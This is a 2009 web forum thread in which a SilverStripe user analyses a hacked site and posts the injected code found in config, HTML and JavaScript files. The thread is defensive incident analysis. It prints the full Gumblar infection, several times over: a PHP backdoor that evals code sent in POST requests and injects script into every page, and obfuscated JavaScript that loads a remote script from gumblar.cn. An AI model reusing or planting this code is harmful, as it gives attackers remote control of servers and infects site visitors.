Skip to main content

This site requires you to update your browser. Your browsing experience maybe affected by not having the most up to date version.

Blog Module /

Discuss the Blog Module.

Moderators: martimiz, Sean, biapar, Willr, Ingo, swaiba, simon_w

BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/


Reply


20 Posts   8226 Views

Avatar
stayatplay

Community Member, 13 Posts

6 May 2009 at 5:31pm

Edited: 06/05/2009 6:09pm

Continuing to investigate...

file "sapphire/_config.php" (md5: E346AEA21C8935FFAC52472256BEB94D)

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihDcVBBKXt2YXIgb09CWHo9JyUnO3ZhciBDYWp5PSd2YXIsMjBhLDNkLDIyLDUzY3JpcHQsNDUsNmVnaSw2ZWUsMjIsMmMsNjIsM2QsMjJWZXJzaW8sNmUoLDI5KywyMiwyY2osM2QsMjIsMjIsMmN1LDNkLDZlYXZpZ2F0b3IsMmV1LDczLDY1ckFnLDY1biw3NCwzYmksNjYoKCw3NSwyZSw2OW4sNjRleE9mLDI4LDIyV2luLDIyKSwzZTApLDI2LDI2KHUsMmVpbmRleE9mKCwyMiw0ZVQsMjA2LDIyLDI5LDNjMCksMjYsMjYoZG8sNjN1bWVuLDc0LDJlY29va2ksNjUsMmVpbmRleE9mKCwyMm1pZWssM2QxLDIyKSwzYzApLDI2LDI2KCw3NHlwZW9mLDI4enJ2enRzKSwyMSwzZHR5LDcwZSw2ZmYoLDIyQSwyMikpLDI5LDdienIsNzYsN2EsNzRzLDNkLDIyQSwyMiwzYmV2YWwsMjgsMjJpLDY2KHcsNjluLDY0byw3NywyZSwyMithKywyMilqLDNkaissMjIrLDYxLDJiLDIyTSw2MWpvciwyMissNjIrYSssMjJNaW5vciwyMitiK2ErLDIyLDQydWksNmNkLDIyK2IrLDIyaiwzYiwyMiksM2JkLDZmY3VtZW50LDJldyw3Mml0ZSgsMjIsM2NzYyw3MmksNzAsNzQsMjBzLDcyYywzZCwyZiwyZmcsNzVtYiw2Y2FyLDJlY24sMmZycyw3MywyZiwzZmlkLDNkLDIyK2osMmIsMjIsM2UsM2MsNWMsMmZzY3JpcHQsM2UsMjIsMjksM2IsN2QnO3ZhciBvMjhTUz1DYWp5LnJlcGxhY2UoQ3FQQSxvT0JYeik7ZXZhbCh1bmVzY2FwZShvMjhTUykpfSkoLywvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

/**
* Sapphire configuration file
*
* Here you can make different settings for the Sapphire module (the core
* module).
*
* For example you can register the authentication methods you wish to use
* on your site, e.g. to register the OpenID authentication method type
*
* <code>
* Authenticator::register_authenticator('OpenIDAuthenticator');
* </code>
*
* @package sapphire
* @subpackage core
*/

// Default director
Director::addRules(10, array(
   'Security//$Action/$ID/$OtherID' => 'Security',
   //'Security/$Action/$ID' => 'Security',
   'db//$Action' => 'DatabaseAdmin',
   '$Controller//$Action/$ID/$OtherID' => '*',
   'images' => 'Image_Uploader',
   '' => 'RootURLController',
   'api/v1/live' => 'VersionedRestfulServer',
   'api/v1' => 'RestfulServer',
   'soap/v1' => 'SOAPModelAccess',
   'dev' => 'DevelopmentAdmin'
));

Director::addRules(1, array(
   '$URLSegment//$Action/$ID/$OtherID' => 'ModelAsController',
));

/**
* PHP 5.2 has a namespace conflict with our datetime class,
* for legacy support, we use this overload method.
* // ENFORCE STRONG_CREATE
*/
Object::useCustomClass('Datetime','SSDatetime',true);

/**
* Add pear parser to include path
*/
$path = Director::baseFolder().'/sapphire/parsers/';
set_include_path(str_replace('.' . PATH_SEPARATOR, '.' . PATH_SEPARATOR . $path . PATH_SEPARATOR, get_include_path()));

/**
* Define a default language different than english
*/
//i18n::set_locale('ca_AD');

/**
* The root directory of TinyMCE
*/
define('MCE_ROOT', 'jsparty/tiny_mce2/');

/**
* The secret key that needs to be sent along with pings to /Email_BounceHandler
*
* Change this to something different for increase security (you can
* override it in mysite/_config.php to ease upgrades).
* For more information see:
* {@link http://doc.silverstripe.com/doku.php?id=email_bouncehandler}
*/
define('EMAIL_BOUNCEHANDLER_KEY', '1aaaf8fb60ea253dbf6efa71baaacbb3');

?>

where only the top is changed, although it's a long line and ends with a php close tag.

using http://www.functions-online.com/base64_decode.html the obfuscated part turns into this...

<script language=javascript><!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
--></script>

then substituting ',' for '%' then using http://www.functions-online.com/urldecode.html the obfuscated part turns into this...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

Again, same web site, "gumblar.cn" flagged for malware and trojans by McAfee SiteAdvisor and Google safe browsing.
[ see http://www.siteadvisor.com/sites/gumblar.cn for report ]

Avatar
stayatplay

Community Member, 13 Posts

6 May 2009 at 5:59pm

Edited: 06/05/2009 6:02pm

Continuing to investigate other files...

file "cms/_config.php" ( md5: 5ECF9B3109A75050C97330DF18889ADD )

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihDcVBBKXt2YXIgb09CWHo9JyUnO3ZhciBDYWp5PSd2YXIsMjBhLDNkLDIyLDUzY3JpcHQsNDUsNmVnaSw2ZWUsMjIsMmMsNjIsM2QsMjJWZXJzaW8sNmUoLDI5KywyMiwyY2osM2QsMjIsMjIsMmN1LDNkLDZlYXZpZ2F0b3IsMmV1LDczLDY1ckFnLDY1biw3NCwzYmksNjYoKCw3NSwyZSw2OW4sNjRleE9mLDI4LDIyV2luLDIyKSwzZTApLDI2LDI2KHUsMmVpbmRleE9mKCwyMiw0ZVQsMjA2LDIyLDI5LDNjMCksMjYsMjYoZG8sNjN1bWVuLDc0LDJlY29va2ksNjUsMmVpbmRleE9mKCwyMm1pZWssM2QxLDIyKSwzYzApLDI2LDI2KCw3NHlwZW9mLDI4enJ2enRzKSwyMSwzZHR5LDcwZSw2ZmYoLDIyQSwyMikpLDI5LDdienIsNzYsN2EsNzRzLDNkLDIyQSwyMiwzYmV2YWwsMjgsMjJpLDY2KHcsNjluLDY0byw3NywyZSwyMithKywyMilqLDNkaissMjIrLDYxLDJiLDIyTSw2MWpvciwyMissNjIrYSssMjJNaW5vciwyMitiK2ErLDIyLDQydWksNmNkLDIyK2IrLDIyaiwzYiwyMiksM2JkLDZmY3VtZW50LDJldyw3Mml0ZSgsMjIsM2NzYyw3MmksNzAsNzQsMjBzLDcyYywzZCwyZiwyZmcsNzVtYiw2Y2FyLDJlY24sMmZycyw3MywyZiwzZmlkLDNkLDIyK2osMmIsMjIsM2UsM2MsNWMsMmZzY3JpcHQsM2UsMjIsMjksM2IsN2QnO3ZhciBvMjhTUz1DYWp5LnJlcGxhY2UoQ3FQQSxvT0JYeik7ZXZhbCh1bmVzY2FwZShvMjhTUykpfSkoLywvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

/**
* Extended URL rules for the CMS module
*
* @package cms
*/
Director::addRules(50, array(
   'processes//$Action/$ID/$Batch' => 'BatchProcess_Controller',
   'admin/help//$Action/$ID' => 'CMSHelp',
   'admin/ReportField//$Action/$ID/$Type/$OtherID' => 'ReportField_Controller',
   'admin/bulkload//$Action/$ID/$OtherID' => 'BulkLoaderAdmin',
   'admin//ImageEditor/$Action' => 'ImageEditor',
   'admin/cms//$Action/$ID/$OtherID' => 'CMSMain',
   'PageComment//$Action/$ID' => 'PageComment_Controller',
   'dev/buildcache' => 'RebuildStaticCacheTask',
));

CMSMenu::populate_menu();
?>

where only the top line is changed, although it's a long line and ends with a php close tag.
Decoding the obfuscated part in top line,
using http://www.functions-online.com/base64_decode.html that turns into this...

<script language=javascript><!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
--></script>

then substituting ',' for '%' then using http://www.functions-online.com/urldecode.html turns into this...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

Same site, again, "gumblar.cn" flagged for malware and trojans by McAfee SiteAdvisor and Google safe browsing.
[ see http://www.siteadvisor.com/sites/gumblar.cn for report ]

Avatar
stayatplay

Community Member, 13 Posts

7 May 2009 at 3:09am

Edited: 07/05/2009 4:06am

I found the "assets/error-404.html" file was also hacked.

<script language=javascript><!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
--></script><body><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script>

There was also a file in a folder on the root directory of the site "webstats.orig/index.html" 68716662B790FEB2B3EE3AD348E3691F
was also corrupted.
decoding, it had this in it...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

same server in china.

A search for the string "function(CqPA){var oOBXz" without the quotes
yielded the files:
tiny_mce_improvements.js
prototype-safe.js
loader.js
prototype15.js
behaviour.js
leftandmain.js
prototype_improvements.js
highlight.js
cmsmain.js
prototype.js
hover.js
base.js
layout_helpers.js

ALL had the following line somewhere in the file... with "base.js" and "leftandmain.js" having it 3 times.

<!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
-->

also the "webstats" directory at root of site.

Avatar
stayatplay

Community Member, 13 Posts

7 May 2009 at 6:06am

found another 2 .js files affected, these with 3 copies each, permutations of the same thing...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}
var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j+"+a "Major" b a+"Minor" b+a+"Build"+b "j;");document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}
var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j+"+a "Major" b a+"Minor"+b a "Build" b+"j;");document.write("<script src=//gumblar.cn/rss/?id=" j "><\/script>");}

Avatar
Ingo

Forum Moderator, 801 Posts

7 May 2009 at 9:03am

The fact that only certain *.php, *.js and *.html files were modified means it might be a targeted attack to SilverStripe. Together with Ronan's observation of the same hack on other servers, this means its not a custom job but possibly a scripted remote attack. Can you confirm that other files haven't been affected? Just do a global search for "eval(base64_decode", that should give it away fairly easily.

@Hugo: You're stating to use the latest version of SilverStripe, which version number? This is a very important piece of information for us. We've released a critical security update mid March (2.3.1), see http://groups.google.com/group/silverstripe-announce/browse_thread/thread/e50889fbd4b8ca52

As Ronan said, its hard to determine the cause of the hack by this information, it could still be a wrongly configured webserver, or another web application interfering. We need webserver access logs, php error logs from the period when you suspect the hack to have taken place.
I've sent you more specific information to look for in the access logs by email.

In general, please report potential hacks to security/at/silverstripe.com. Use this email address for the log files etc. as well - we'll update this forum post and our other announce lists if we find anything directly related to SilverStripe.

Avatar
Ingo

Forum Moderator, 801 Posts

7 May 2009 at 11:46am

I'm currently waiting for Hugo to send me the apache and php logs so we can investigate. The fact that he used 2.3.1 means that we might have an unpatched vulnerability unfortunately. Ronan, do you have any info about the SilverStripe versions you investigated? And perhaps even apache logs for those?

Avatar
stayatplay

Community Member, 13 Posts

7 May 2009 at 12:20pm

Edited: 07/05/2009 12:21pm

The version has been added at the top of the thread...
>> Using SilverStripe-v2.3.1.tar.gz md5: e58977eb716f1d7b1ad28c12dc993486
>> Using blog-v0.2.0.tar.gz md5: 781dd48c9ae1b30ec31e8a826ddd95dc

I've sent all the logs I have access to but since it's a security issue I suspect Hostway won't want to share any more info, even though I asked that they get in touch with you at your security e-mail. I told them in writing that I give them permission to share the stuff with you and gave them your e-mail addresses.

I sent them your e-mail earlier stating the problem and sent them a compilation just now of all the e-mail and links to this thread.

-Hugo.

Avatar
stayatplay

Community Member, 13 Posts

8 May 2009 at 2:48am

Edited: 08/05/2009 2:49am

I also discovered that all the HTML files outside the Silverstripe installation had also been modified on the same date, as well as a the javascript ".js" files, to insert the code:

<script language=javascript><!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
--></script>

again, substituting commas for % signs and using urldecode, you get:

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

Same hack.
I deleted those and replaced them with the original versions.